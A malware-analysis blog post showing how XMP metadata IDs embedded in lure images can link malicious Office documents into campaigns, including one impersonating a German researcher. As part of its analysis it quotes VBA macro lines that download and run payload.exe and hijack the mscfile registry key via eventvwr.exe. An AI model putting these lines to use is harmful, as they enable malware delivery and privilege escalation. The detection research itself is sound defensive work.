Blog post by Pedram Amini and Mike Remen
In this blog, we discuss Adobe Extensible Metadata Platform (XMP) identifiers (IDs) and how they can be used as both pivot and detection anchors. Defined as a standard for mapping graphical asset relationships, XMP allows for tracking of both parent-child relationships and individual revisions. There are three categories of identifiers: original document, document, and instance. Generally, XMP data is stored in XML format, updated on save/copy, and embedded within the graphical asset. This last tenet is critical to our needs as we'll be tracking the usage and re-usage of both malicious and benign graphics within common Microsoft and Adobe document lures.
Let's begin with a visual reference. In the following graphic, each column represents a single asset. Each row within that column represents a unique revision or "instance" of that asset. The first column represents the original asset with each subsequent column representing a copy of the previous column:
Each instance of the asset carries with it three identifiers. The Original Document ID (OID), Document ID (DID), and Instance ID (IID). The Instance ID (IID) is updated on each saved revision of the asset. The Document ID (DID) remains the same for all revisions but is unique to that copy of the asset. Finally, the Original Document ID (OID) is a backreference to the original asset from which it was derived. We have observed two formats for these identifiers: MD5 hash (32 bytes) and GUID (36 bytes). Adobe XMP is an old standard originating back to 2001. To our knowledge, no one has previously applied the standard towards malware analysis.
Application and Alternatives
Having detailed the definitions, the question remains, how are these useful? First, graphical assets are commonly re-used across malware lures. Consider for example Microsoft Office documents that embed an image coercing the user to "enable content". While the macro and payload may vary from sample to sample, we have observed the same graphical asset re-used across many variants. Second, graphical assets are commonly lifted from legitimate sources. Examples here include fake invoice and phishing scams that embed legitimate company logos. In either case, tracking the usage of a graphical asset can prove valuable.
There are alternatives to XMP of course. In order of worst to best applicable for this use case (in our humble opinion), one can lean on: cryptographic file hashes, Optical Character Recognition (OCR), or perceptual hashes (aHash, pHash, dHash, wHash). While XMP data is easily stripped, when available, it provides advantages over all of these techniques:
- Cryptographic file hashes such as MD5, SHA1, SHA256, etc vary wildly with even a single bit change.
- OCR is a compute-intensive and error-prone process. We're already seeing malware authors leverage techniques to decrease the efficacy of OCR by, for example, implementing blurring or leveraging different shades of the same color for the foreground text and background. Additionally, not all graphical assets have text.
- Perceptual hashes are also compute-intensive and error-prone, but generically a solid approach to apply when XMP data is unavailable.
In practice, InQuest watches ~1000 unique XMP IDs for the purposes of malware discovery. We utilize YARA hunt rules atop of VirusTotal Intelligence to harvest files into our corpora for further analysis (Deep File Inspection) and catalog. A significant slice of this data is made freely available to researchers via our free (as in beer) and open InQuest Labs data portal. Search an ever growing corpus of malicious and benign document samples by artifacts such as URLs, domains, IPs, e-mail addresses, file names, and XMP IDs. Upload documents for analysis and inclusion in the corpus. The usage of XMP IDs to anchor on new samples frequently results in the discovery of novel documents with low AV detection rates. Throughout the remainder of this blog, we'll reference samples from labs.inquest.net so that readers can follow along with real-world samples.
Microsoft Office DOCX with PNG
We begin with a simple sample. A Microsoft Office Word Document, in DOCX format:
Beginning in 2007, Microsoft changed the default document file format from the Compound Document Format (CDF/OLE) to the Open XML format. These files can simply be renamed from .docx to .zip and decompressed with standard tools. Simply unzipping this document will reveal the following image in the path ./word/media/image1.png:
A classic malware lure that entices the user into enabling active content which, in turn, will execute malicious macro logic to pivot to further payload stages. Note that this document lure triggers detection through analysis of the semantic context embedded within the image and extracted via Optical Character Recognition (OCR). You can see that layer exposed via InQuest Labs as depicted here in a screenshot excerpt:
Use the labs portal to pivot to other samples with coercive content in the OCR or plain-text semantic layers. While this blog is not intended to cover the specifics of the macro malware, this is a well-rounded sample in the sense that it combines data from multiple layers in an attempt to avoid detection and we'll take a slight detour to dissect it. These layers are trivially exposed through Deep File Inspection (DFI), a core tenet of the InQuest platform. Readers can follow along via this direct link on InQuest Labs, we begin with the following excerpt from the "Embedded Logic" layer which is executed upon document open via the startup hook "Auto_Open()":
For i = 1 To 65535555 If i = 65535555 Then For t = 1 To 65535555 If t = 65535555 Then For b = 1 To 65535555 If b = 65535555 Then For a = 1 To 65535555 If a = 65535555 Then For x = 1 To 65535555 If x = 65535555 Then
Five embedded loops, each looping to 65,535,555, for a total of 327,677,775 seemingly superfluous executed directives before the next block of logic is executed. What's the purpose of this? Probably an attempt at evading sandbox technologies that leverage dynamic analysis to monitor the behavior of samples in a controlled environment. By their nature, sample detonation must be limited in some way, be it based on time or instruction count. You can read more about sandbox technologies in our previous blog Defense in Depth: Detonation Technologies. Looking beyond this evasion logic, note that data is read from the "Semantic Context" layer of the document:
Set c = ActiveDocument.Content
The data read is:
The "Start" and "End" markers are then stripped off and subsequent payload downloaded, executed, and hooked into the Windows Registry for persistence. The key lines of code from the VBA macro are shown here:
StartWord = "Start": EndWord = "End" ... geturl = Replace(Replace(c.Text, StartWord, ""), EndWord, "") ... Call DownloadFile(URLtoFile, FilePath + "\payload.exe") ... Call RegiWrite("HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command\", FilePath + "\payload.exe") ... RetVal = CreateObject("WScript.Shell").Run("eventvwr.exe")
The final executable payload, test.exe (VirusTotal, Joe Sandbox), turns out to be a harmless pentest sample of sorts as the executable is downloaded from http://bech0r.net, home to a legitimate security researcher (side note: awesome background cinematic hacker ambient beat on this site… this is the soundtrack we're using to kick off all hack sessions moving forward). Here is a screenshot of the benign output indicating the success of the execution of the lure:
Switching focus back to the task at hand, let's examine the AV consensus for the document lure on VirusTotal. Detection rates began with 14 vendors on 7/15/2018 and matured to 31 vendors on 9/24/2019, as depicted here:
We can leverage standard Linux command-line tools to extract the XMP IDs from the image:
$ strings ./word/media/image1.png | grep xpacket | xmllint --format - | grep iid
<rdf:Description xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#"' xmlns:xmp="http://ns.adobe.com/xap/1.0/" rdf:about="" xmpMM:OriginalDocumentID="xmp.did:59D68E8C27A2E711964BBD7939DA4803" xmpMM:DocumentID="xmp.did:5F6437DAA22811E7975EC6C88D5BC4AF" xmpMM:InstanceID="xmp.iid:5F6437D9A22811E7975EC6C88D5BC4AF" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:59D68E8C27A2E711964BBD7939DA4803" stRef:documentID="xmp.did:59D68E8C27A2E711964BBD7939DA4803"/>
Or, alternatively, use the ever popular Exiftool:
$ exiftool ./word/media/image1.png | grep -i xmp
XMP Toolkit : Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 Original Document ID : xmp.did:59D68E8C27A2E711964BBD7939DA4803 Document ID : xmp.did:5F6437DAA22811E7975EC6C88D5BC4AF Instance ID : xmp.iid:5F6437D9A22811E7975EC6C88D5BC4AF Derived From Instance ID : xmp.iid:59D68E8C27A2E711964BBD7939DA4803 Derived From Document ID : xmp.did:59D68E8C27A2E711964BBD7939DA480
Regardless of the approach, we're going to leverage the IOC pivot tool on InQuest Labs to search for other samples that may contain images derived from the same parent asset (59D68E8C27A2E711964BBD7939DA4803).
The pivot reveals two additional samples:
- 6b0aad2732169740ba5556ec7a8c90da05af208971a3821ab0c9c1fbdc4961f5 (VT, InQuest Labs)
- 0aa7b1554cf5a8deb29b145041623d7c67e42c04801637adb02b26203a96caaa (VT, InQuest Labs)
Detection rates for sample 6b0aad27 started with 20 vendors on 8/19/2018 and matured to 34 vendors on 9/24/2019. Detection rates for 0aa7b155 started with only 6 vendors on 8/19/2019 and matured to 19 vendors on 9/24/2019. Their relevant scan histories are depicated below:
We can immediately see the value of leveraging XMP IDs to identify related and potentially stealthier samples of the same campaign. As a generalized workflow:
- Ingest files from a variety of sources, both benign and malicious.
- Extract graphical assets looking for XMP identifiers.
- Catalog these identifiers and reference that catalog for pivoting to other samples.
Researchers already employ similar tactics on IP and domain IOCs. This approach provides a pivot engine for a subset of file content.
Microsoft Office DOCX with JPG
Having demonstrated the fundamental value of XMP identifier pivoting, let's dive into another DOCX example, this time with an embedded JPG. This sample is also available on InQuest Labs so readers can follow along, the SHA256 hash value is:
AV consensus on this malicious document lure started with 6 vendors on 7/22/2019 and matured to 32 vendors by 9/29/2019. Once again, downloading, renaming to .zip, and decompressing the archive results in the discovery of a graphical asset, ./tge-zip-1-1/word/media/image2.jpeg, shown here:
There's another image in the media folder, image1.jpeg, we'll circle back to that shortly. Looking at the extracted IOCs panel under InQuest Labs, we see a number of XMP IDs in both GUID and MD5 formats:
The XMP IDs above are collected from all graphical assets that were discovered in the DFI process. We can pivot on each of the IOCs directly from the interface, which will include the "xmp.[doi]id:" prefix. Stripping the prefix will expand our search and we've curated the complete list for your convenience and exploration here:
While we're focused on XMP pivots in this blog, readers should note that there are other interesting pivots that can be made as well, including:
- OCR pivot: https://labs.inquest.net/dfi/search/ext/ext_ocr/enable%20content
- IP IOC pivot: https://labs.inquest.net/dfi/search/ioc/ip/18.104.22.168
Let's manually extract the XMP identifiers from image2.jpeg using Exiftool and focus solely on those:
$ exiftool image2.jpeg | grep -i xmp
Toolkit : Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 Instance ID : xmp.iid:CAE628A27467E911AD18A821864C67C5 Document ID : xmp.did:B3D4F1219157E911B37B9950729CB11D Original Document ID : xmp.did:B3D4F1219157E911B37B9950729CB11D History Instance ID XMP : xmp.iid:B3D4F1219157E911B37B9950729CB11D, xmp.iid:CAE628A27467E911AD18A821864C67C5 Derived From Instance ID : xmp.iid:C9E628A27467E911AD18A821864C67C5 Derived From Document ID : xmp.did:B3D4F1219157E911B37B9950729CB11D Derived From Original Document ID: xmp.did:B3D4F1219157E911B37B9950729CB11D
The instance ID for this specific asset is CAE628A27467E911AD18A821864C67C5, looking one level up at the document ID or original document ID we see B3D4F1219157E911B37B9950729CB11D. We can pivot on this identifier through InQuest Labs:
As of the time of this writing, the above search results in 88 different XMP records spread across 44 unique files. The complete list of SHA256 hashes is listed here in alphabetical order. We've highlighted the 8th hash below, more on this sample in the next segment.
More Interesting Pivots
Recall from earlier in the blog we compared and contrasted a variety of methods for tracking graphical asset re-use across malware lures. Cryptographic file hashes, perception hashes, and OCR based semantic extraction. We posited that, when available, XMP identifiers provide a fast and valuable alternative to these methods. Let's take a look at highlighted 8th hash from the list above:
This document lure provides a great example of the value of the XMP approach. Here's image2.jpeg from that sample:
Note that it is the German language equivalent of the image2.jpeg from the original lure. The unique instance ID for this asset is B6D4F1219157E911B37B9950729CB11D, as shown here through Exiftool:
$ cat image2.jpeg.exiftool | grep -i xmp
XMP Toolkit : Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 Instance ID : xmp.iid:B6D4F1219157E911B37B9950729CB11D Document ID : xmp.did:B3D4F1219157E911B37B9950729CB11D Original Document ID : xmp.did:B3D4F1219157E911B37B9950729CB11D History Instance ID : xmp.iid:B3D4F1219157E911B37B9950729CB11D Derived From Instance ID : xmp.iid:B5D4F1219157E911B37B9950729CB11D Derived From Document ID : xmp.did:B3D4F1219157E911B37B9950729CB11D Derived From Original Document ID: xmp.did:B3D4F1219157E911B37B9950729CB11D
But the asset shares the same parent ID of B3D4F1219157E911B37B9950729CB11D with CAE628A27467E911AD18A821864C67C5. To think about this in human terms. An initial asset was created and saved, then the text translated and resaved. Thus producing two unique assets with the same parent ID. While this relationship can also be derived from a perception hash, the XMP approach is far better performing. Again, readers should note that other pivot options are available. For example, searching for the German language equivalent of "Enable Content".
Recall from earlier in the DOCX with JPG example that we glazed over image1.jpeg. Let's circle back and take a look at that image now:
It looks like a template for a structured resume. The profile shot looks legitimate as well, though who knows in this day and age of generative algorithms. Carving out the profile photo and feeding it through the TinEye reverse image search, we get a match on Dr. Britta Höllermann, a [German university research assistant}(https://www.geographie.uni-bonn.de/research/rg/rg-evers/staff/britta-hoellermann) whose identity is seemingly being leveraged as part of the social engineering dimension of this malware campaign. Let's compare the XMP identifiers between the image above and the image found via the reverse image search below:
# malware lure embedded image. $ exiftool image1.jpeg | grep -i xmp
XMP Toolkit : Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 Instance ID : xmp.iid:78113FDD7F57E911B37B9950729CB11D History Instance ID : xmp.iid:77113FDD7F57E911B37B9950729CB11D Document Ancestors : xmp.did:97ba5d41-3019-4fa8-8e66-c2edb9f4b5e8
# reverse image search discovered match. $ wget https://www.geographie.uni-bonn.de/forschung/ags/ag-evers/Team/1bh.jpg $ exiftool 1bh.jpg | grep -i xmp
XMP Toolkit : Adobe XMP Core 5.5-c002 1.148022, 2012/07/15-18:06:45 Document ID : xmp.did:97ba5d41-3019-4fa8-8e66-c2edb9f4b5e8 Instance ID : xmp.iid:d1b150a4-7321-4874-b61e-ac58bf4f81d2 History Instance ID : xmp.iid:635cbfe1-2c45-49f0-9158-19ec213c86e7, xmp.iid:ca378365-ad41-4284-8cb7-e8b627602372, xmp.iid:97ba5d41-3019-4fa8-8e66-c2edb9f4b5e8, xmp.iid:C4C93C76192068118083F8015B1BC4AF, xmp.iid:73B02411182068118083CE7276DA08A4, xmp.iid:0dad9cdc-3dc6-4118-8a5c-bb239234984a, xmp.iid:C5C93C76192068118083F8015B1BC4AF, xmp.iid:20659034222068118083CE7276DA08A4, xmp.iid:c5056276-dc8e-4f38-9aae-f04096a86fda, xmp.iid:AD90EF6D362068118083F8015B1BC4AF, xmp.iid:AE90EF6D362068118083F8015B1BC4AF, xmp.iid:222AB06C382068118083CE7276DA08A4, xmp.iid:d1b150a4-7321-4874-b61e-ac58bf4f81d2 Derived From Instance ID : xmp.iid:AD90EF6D362068118083F8015B1BC4AF Derived From Document ID : xmp.did:97ba5d41-3019-4fa8-8e66-c2edb9f4b5e8
Notice the overlap here. The ancestor document GUID from the malware lure matches that of the asset discovered via reverse image search. Pivoting from this XMP identifier, we're able to enumerate other malware samples that impersonate Dr. Höllermann. We found ~150 unique malware samples with an average of ~10 AV detections on samples that overlap with VT. Tracing the campaign further we determine that the majority of final delivered executable payloads is ransomware, one example instance being:
We hope to have inspired additional research atop of sample clustering through XMP identifier relationships and look forward to feedback from the community with how we can make InQuest labs an invaluable tool for your research projects. Get in touch with us directly via Twitter or e-mail.